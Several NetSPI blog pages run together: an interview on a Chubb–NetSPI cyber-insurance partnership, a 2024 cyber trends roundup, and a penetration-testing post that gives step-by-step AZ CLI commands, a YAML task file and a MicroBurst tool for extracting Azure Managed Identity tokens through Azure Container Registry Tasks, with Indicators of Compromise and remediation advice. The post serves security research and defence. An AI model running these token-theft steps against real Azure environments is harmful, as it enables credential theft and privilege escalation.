Craig Guiliano: Proactive security, quite simply, is trying to identify exposures before a threat actor, but often from the point of view of the threat actor.  By taking a proactive approach, you could mitigate the exposure before a threat actor can exploit it. Through Chubb’s partnership with NetSPI, Chubb policyholders in the U.S. and Canada can take advantage of NetSPI’s full portfolio of proactive security solutions, including Breach and Attack Simulation (BAS), Attack Surface Management (ASM), as well as a suite of comprehensive penetration testing offerings, at preferred pricing, subject to applicable insurance laws.

Aaron Shilts: Proactive security is at the core of NetSPI’s DNA. It’s the combination of security activities that ultimately mitigate the risk of a security incident or breach. Pentesting, red teaming, breach and attack simulation, and external attack surface management all contribute to a well-rounded program. For those who follow NIST’s cybersecurity framework, these activities fall within the Identify and Protect functions at the framework’s core. We’re eager to help Chubb clients activate proactive security so that they can gain visibility into which critical assets must be protected to ensure business continuity, accurately discover exposures and vulnerabilities, and break through the noise to prioritize remediations. It’s essentially the first line of defense against adversaries – and an incredible opportunity to build trust with customers.

How will this program impact Chubb clients and, more generally, those seeking cyber insurance? 

Craig Guiliano: Chubb is now able to provide our Cyber insurance policyholders across all segments access to NetSPI’s enterprise-class offensive security services to help them mitigate cyber threats and exposures. NetSPI has developed a customized set of services for Chubb clients that are particularly geared towards smaller companies, in addition to preferred pricing for any of NetSPI’s services. For companies with annual revenues over $100m seeking cyber insurance, Chubb will be leveraging NetSPI’s Attack Surface Management platform to proactively perform a scan to identify vulnerabilities and/or exposures before it could be exploited by a threat actor.

Aaron Shilts: Chubb’s commitment to helping their clients mitigate risks that could lead to a claim should be applauded. Chubb is setting a high standard in the insurance industry by offering the resources necessary to stay resilient throughout the policy lifecycle – and beyond. NetSPI shares the same commitment by being hyper-focused on helping organizations discover, prioritize, and remediate security issues, before it’s too late. Whether we’re alerting to high-impact attack surface exposures, facilitating deep-dive, comprehensive pentests in your critical environments, fine tuning detections to prevent ransomware, or anything in between, we’re thrilled to have this opportunity to bring our team, expertise, and technology to Chubb’s customer base so they can continue to innovate with confidence.

Why now? How has the cyber landscape changed, prompting a program like this?

Craig Guiliano: Cyber insurance must evolve because the cyber threat landscape is constantly changing. Attack surfaces are growing, and as they grow, the opportunities for threat actors to find new exposures to exploit increases. Chubb is always looking to assist our customers in avoiding cyber threats, because a cyber incident can not only be disruptive, but for many businesses, it could be devastating.

Aaron Shilts: Security leaders today are faced with a seemingly impossible task of keeping pace with the rate of change and innovation. And that rate is only increasing with the advancements in machine learning and adoption of large language models (LLMs), among other emerging technologies. Now is the time for organizations to double down on their proactive security to continuously evaluate and improve their security posture alongside innovation. This program is a great reminder that security should not be an afterthought.

Why did Chubb select NetSPI as its proactive security partner?

Craig Guiliano: In my career, I’ve worked with several proactive security vendors, including NetSPI, and NetSPI consistently delivered high-quality assessment results. They understand the importance of not only identifying risks and exposures, but of ensuring the customer understands the exposure and mitigation options. The NetSPI team’s quick understanding of what we were trying to accomplish from a cyber underwriting standpoint, and their ability to rapidly develop a tailored Attack Surface Management (ASM) solution for Chubb and our clients that provides a level of visibility that can help identify exposures and risks before they escalate to a claim.

Are you a cyber insurer looking to bring added value to your policyholders and help them mitigate the risk of claim? Get a conversation started with our partnerships team.

SHARE
Team NetSPI

Recent Posts

Mainframe Mania: Highlights from SHARE Orlando 2024 
Executive BlogPersonnel Development
March 26, 2024

Mainframe Mania: Highlights from SHARE Orlando 2024 

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 
Executive BlogAttack Surface Management
March 19, 2024

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 
Executive BlogAttack Surface Management
March 5, 2024

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 

Back

5 Cyber Trends to Expect in 2024

| Team NetSPI
Executive Blog NetSPI Updates

The past year certainly had no shortage of cybersecurity firsts. From the emergence of the MOVEit vulnerability to the wide adoption of ChatGPT and its associated security risks, nearly every industry was impacted by cyber threats. These major trends throughout the year have kept security professionals on their toes—pushing practitioners to stop playing defense against malicious actors and shift to a more proactive approach to security.  

As we look toward 2024, some aspects will remain the same, such as persistent ransomware and cloud-based attacks, as well as AI creating a larger attack vector for cybercriminals. The shift, however, will be in how the cybersecurity industry—and specifically, IT security vendors—helps customers transition to being more proactive against cyber threats. We asked our global team to weigh in on the trends they anticipate shaping the new year and what will help push the need for proactive security. Here’s what they had to say.

AI and Large Language Models (LLMs) are at the proverbial tip of the iceberg.

Vinay Anand

Vinay Anand
CPO

What we saw with AI and LLMs, and given the amount of investment that has gone into progressing this technology, I expect to see rapid innovation in all aspects of LLM usage in 2024—specifically at the foundational level, such as scale and efficiency. More importantly, we will see the emergence of very impactful use cases in industry verticals such as healthcare, learning, manufacturing, and automation.   

We will also see increased adoption of LLMs for the edge—LLMs, and AI will go where the data resides or is generated as opposed to aggregating all the data to a centralized location. This adoption will accelerate exponentially in addressing some of society’s most complex and urgent problems. Furthermore, I expect more solutions and regulations to emerge to grant organizations the confidence and guidance they need to use these powerful tools effectively and in a trustworthy manner.” 

The best security program requires a combination of purpose-built, automated technology and human intuition and intelligence.

Nabil Hannan

Nabil Hannan
Field CISO

“We’re still facing a deficit of cybersecurity professionals globally. The skills shortage will ultimately be the bottleneck impacting the effectiveness of cybersecurity initiatives. Additionally, budgets and investments into proactive security training and procurement are being put on hold, so businesses, in turn, are limiting their ability to improve their cybersecurity posture. That needs to flip in 2024 as organizations that fail to keep pace with the rate of transformation in the industry will inevitably falter, as the human element is still the weakest link in today’s cyber ecosystem.”

A politically focused year will spark more nation-state attacks.

Nick Walker

Nick Walker
Regional Director, EMEA

“As we enter 2024, notably an election year for many, political situations will likely lead to more nation-state attacks against critical and national infrastructure. A politically focused year, along with increasing usage of technologies such as Artificial Intelligence (AI), will require businesses to lean towards establishing strong and efficient spending, along with more software-based solutions that empower an ‘always on’ mindset to combat today’s threat landscape.”

Regulations will continue to progress, but insider threats remain the biggest roadblock to securing the software supply chain.

Tyler Sullivan

Tyler Sullivan
Senior Security Consultant

“The U.S. has made strides in cybersecurity legislation and guidance in 2023. Most notably, CISA announced its Open-Source Software (OSS) security roadmap, and the U.S. partnered with Japan, India, and Australia to strengthen software security for governments. Collaborative work like this will drive security forward for nations that may not have security maturity. 

The new SEC guidelines are essential in the evolving cybersecurity landscape. The SEC puts more pressure on organizations to create more robust security practices. Even though regulations are not always flawless, such as the guidelines requiring disclosures within four days of an incident being declared ‘material.’ This short time frame could open up loopholes regarding incident categorization; however, it’s a step in the right direction. In the new year, I would expect more urgency in legislation, including continued pressure on software suppliers themselves, to keep up with the ever-increasing risk of the software supply chain.”

Teams must keep pace with digital transformation to ensure cloud security.

Karl Fosaaen

Karl Fosaaen
VP of Research

“Across industries, even with workloads shifting to the cloud, organizations suffer from technical debt and improper IT team training – causing poorly implemented and architected cloud migration strategies. In 2024, IT teams will look to turn this around and keep pace with the technical skills needed to secure digital transformations. Specifically, I expect to see IT teams limit account user access to production cloud environments and monitor configurations for drift to help identify potential problems introduced with code changes.  

Every cloud provider has, more or less, experienced public difficulties with remediation efforts and patches taking a long time. I anticipate seeing organizations switch to a more flexible deployment model in the new year that allows for faster shifts between cloud providers due to security issues or unexpected changes in pricing. Microsoft’s recent ‘Secure Future Initiative’ is just the start to rebuild public trust in the cloud.”  

The year 2024 will undoubtedly be a rollercoaster for the cybersecurity industry, but we hope these insights help organizations get on the offense and remain vigilant against growing threats. Here’s to a more secure, collaborative, and proactive new year!

SHARE
Team NetSPI

Recent Posts

Mainframe Mania: Highlights from SHARE Orlando 2024 
Executive BlogPersonnel Development
March 26, 2024

Mainframe Mania: Highlights from SHARE Orlando 2024 

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 
Executive BlogAttack Surface Management
March 19, 2024

From Scanners to Strategies: How Attack Surface Management Enhances Vulnerability Scanning 

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 
Executive BlogAttack Surface Management
March 5, 2024

NetSPI’s View on the 2023 Gartner® Competitive Landscape: External Attack Surface Management Report 

Back

Automating Managed Identity Token Extraction in Azure Container Registries

| Karl Fosaaen
Technical Blog Cloud Penetration Testing

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the “Tasks” functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We’ve created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR 
  • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue 
  1. The attacker creates a malicious YAML task file  
  • The task authenticates to the Az CLI as the Managed Identity, then generates a token 
  1. A Task is created with the AZ CLI and the YAML file 
  2. The Task is run in the ACR Task container 
  3. The token is written to the Task output, then retrieved by the attacker 

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
  2. Identify the available Container Registries with the following command:
az acr list
  1. Write the following YAML to a local file (.\taskfile) 
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
  1. Note that this assumes you are using a System Assigned Managed Identity, if you’re using a User-Assigned Managed Identity, you will need to add a “–username <client_id|object_id|resource_id>” to the login command 
  2. Create the task in the ACR ($ACRName) with the following command 
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
  1. If you’re using a User-Assigned Managed Identity, replace [system] with the resource path (“/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/
    Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>”) for the identity you want to use 
  2. Use the following command to run the command in the ACR 
az acr task run -n sample_acr_task -r $acrName 
  1. The task output, including the token, should be displayed in the output for the run command. 
  2. Next, we will want to delete the task with the following command 
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the “Runs” of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn’t a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 

Automating Managed Identity Token Extraction in Azure Container Registries

Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the “Management” (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter. 
    • Two commonly used options: 
  1. https://graph.microsoft.com/ – Used for accessing the Graph API
  2. https://vault.azure.net – Used for accessing the Key Vault API 
  • The Output is a Data Table Object that can be assigned to a variable  
    • $tokens = Invoke-AzACRTokenGenerator 
    • This can also be appended with a “+=” to add tokens to the object 
  1. This is handy for storing multiple token scopes (Management, Graph, Vault) in one object 

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:

Automating Managed Identity Token Extraction in Azure Container Registries

Indicators of Compromise (IoCs) 

To better support the defenders out there, we’ve included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name Description 
Microsoft.ContainerRegistry/registries/tasks/write Create or update a task for a container registry. 
Microsoft.ContainerRegistry/registries/scheduleRun/action Schedule a run against a container registry. 
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/actionGet the log SAS URL for a run. 
Microsoft.ContainerRegistry/registries/tasks/delete Delete a task for a container registry.

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above. 

SHARE
Karl Fosaaen

Recent Posts

Elevating Privileges with Azure Site Recovery Services
Technical BlogCloud Penetration Testing
March 28, 2024

Elevating Privileges with Azure Site Recovery Services

Web2 Bugs in Web3 Systems
Technical BlogBlockchain Penetration Testing
March 19, 2024

Web2 Bugs in Web3 Systems

Azure Deployment Scripts: Assuming User-Assigned Managed Identities
Technical BlogCloud Penetration Testing
March 14, 2024

Azure Deployment Scripts: Assuming User-Assigned Managed Identities

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

Learn More
X